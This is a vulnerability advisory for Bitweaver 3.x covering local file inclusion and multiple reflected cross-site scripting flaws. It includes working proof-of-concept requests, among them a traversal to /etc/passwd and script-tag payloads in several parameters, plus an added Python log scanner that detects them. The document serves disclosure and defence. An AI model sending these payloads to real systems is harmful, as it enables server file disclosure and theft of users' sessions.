Bitweaver Multiple Cross-Site Scripting and Local File Inclusion Vulnerabilities

Source: Internet
Author: User

Affected Systems:
Bitweaver 3.x
Description:
--------------------------------------------------------------------------------
Bugtraq ID: 56230
CVE ID: CVE-2012-5192, CVE-2012-5193

Bitweaver is a free open-source Web application framework and content management system.

Bitweaver 3.1 and other versions have multiple security vulnerabilities. Attackers can exploit them to execute arbitrary script code, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the Web server process.

1) Input passed via the "username" POST parameter to users/remind_password.php, the "days" POST parameter to stats/index.php, and the "login" POST parameter to users/register.php is not properly filtered before being returned to the user. Attackers can exploit this to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

2) Input passed via the "textarea_id" parameter to quicktags/special_chars.php and the "email" POST parameter to users/register.php is not properly filtered before being returned to the user. Attackers can exploit this to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

<* Source: David Aaron *>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended for security research and teaching only. Users proceed at their own risk!

Finding 1: Local File Inclusion Vulnerability
CVE-2012-5192

The 'overlay_type' parameter of the 'gmap/view_overlay.php' page in
Bitweaver is vulnerable to local file inclusion.

This vulnerability can be demonstrated by traversing to a known readable
path on the web server file system.

Example:

Demonstrating LFI on the 'overlay_type' parameter

# Request

http://www.example.com/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

# Response

root:x:0:0:root:/bin/bash
<Snip>

Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE-2012-5193

Multiple cross-site scripting (XSS) vulnerabilities have been discovered
that allow remote unauthenticated users to run arbitrary scripts on the
system.

Example:

The following Proofs of Concept demonstrate that Bitweaver 2.8.1 is
vulnerable to XSS.

Example(s):

1. Demonstrating XSS on stats/index.php

# Request

GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('xsss')%3B%3C%2Fscript%3E HTTP/1.0

# Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
[Truncated due to length]

2. Demonstrating XSS on /newsletters/edition.php

# Request

GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E HTTP/1.0

# Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
[Truncated due to length]

3. Demonstrating XSS on the 'username' parameter available on /users/

# Request

POST /bitweaver/users/remind_password.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

username=%22%3E%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E&remind=Reset+%28password%29

# Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 15974
[Truncated due to length]

<Snip>
Invalid or unknown username: "><script>alert('xsss');</script></p></div> Please follow the instructions in the email.
<Snip>

4. Demonstrating XSS on the 'days' parameter on /stats/index.php

# Request

POST /bitweaver/stats/index.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

days=%22%3E%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E&pv_chart=Display

# Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24778
[Truncated due to length]

<Snip>
<script>alert('xss');</script>" alt="Site Usage Statistics"/>
<Snip>

5. Demonstrating XSS on the 'login' parameter on /users/register.php (try
entering "><IFRAME src="https://www.trustwave.com" height="1000px"
width="1000px"> into the "Username" field):

http://www.example.com/bitweaver/users/register.php


6. Demonstrating XSS on the 'highlight' parameter:

# Request

GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('xss')%253B%253C%252Fscript%253E HTTP/1.0

# Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:59:09 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
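The requests above share two observable traits in a web server access log: a traversal sequence with a trailing null byte on the 'overlay_type' parameter (Finding 1), and URL-encoded or, for 'highlight', double-encoded script tags in the request target (Finding 2). The following detector is an added example, not part of the advisory or of Bitweaver; the log lines it scans are constructed to mirror the advisory's PoC requests, and the decoding loop exists so the double-encoded case is seen in its final form.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the advisory) modelled on its
# Bitweaver PoC requests: LFI on gmap/view_overlay.php, reflected XSS on
# stats/index.php, the double-encoded 'highlight' case, and one benign hit.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Apr/2012:15:40:01 +0000] "GET /bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.0" 200 1204
10.0.0.5 - - [17/Apr/2012:15:42:34 +0000] "GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E HTTP/1.0" 200 24778
10.0.0.5 - - [17/Apr/2012:15:59:09 +0000] "GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('xss')%253B%253C%252Fscript%253E HTTP/1.0" 200 9981
10.0.0.7 - - [17/Apr/2012:16:01:12 +0000] "GET /bitweaver/gmap/view_overlay.php?overlay_type=marker HTTP/1.0" 200 3310
"""

# Pulls method and request target out of a common/combined log format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def full_decode(s, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded payload (%2522 -> %22 -> ")
    is examined in the form the application finally sees."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(target):
    """Return finding tags for one request target, or [] if nothing matched."""
    decoded = full_decode(target)
    tags = []
    # Traversal segments or an embedded null byte: LFI attempt (Finding 1).
    if "../" in decoded or "..\\" in decoded or "\x00" in decoded:
        tags.append("lfi-traversal")
    # A script or iframe tag in the target after decoding: XSS (Finding 2).
    if re.search(r"<\s*(script|iframe)\b", decoded, re.IGNORECASE):
        tags.append("xss-tag-injection")
    return tags


def scan_log(text):
    """Return (line_no, target, tags) for every log line that trips a check."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m and (tags := classify_request(m.group("target"))):
            hits.append((n, m.group("target"), tags))
    return hits


if __name__ == "__main__":
    for n, target, tags in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(tags)}  {target[:60]}")
```

Matching on the decoded target rather than the raw one is what keeps the 'highlight' request from slipping past a single-decode rule.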

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Bitweaver
---------
Currently, the vendor has not released a patch or upgrade. Users of this software are advised to check the vendor's homepage for the latest version:

http://www.bitweaver.org/
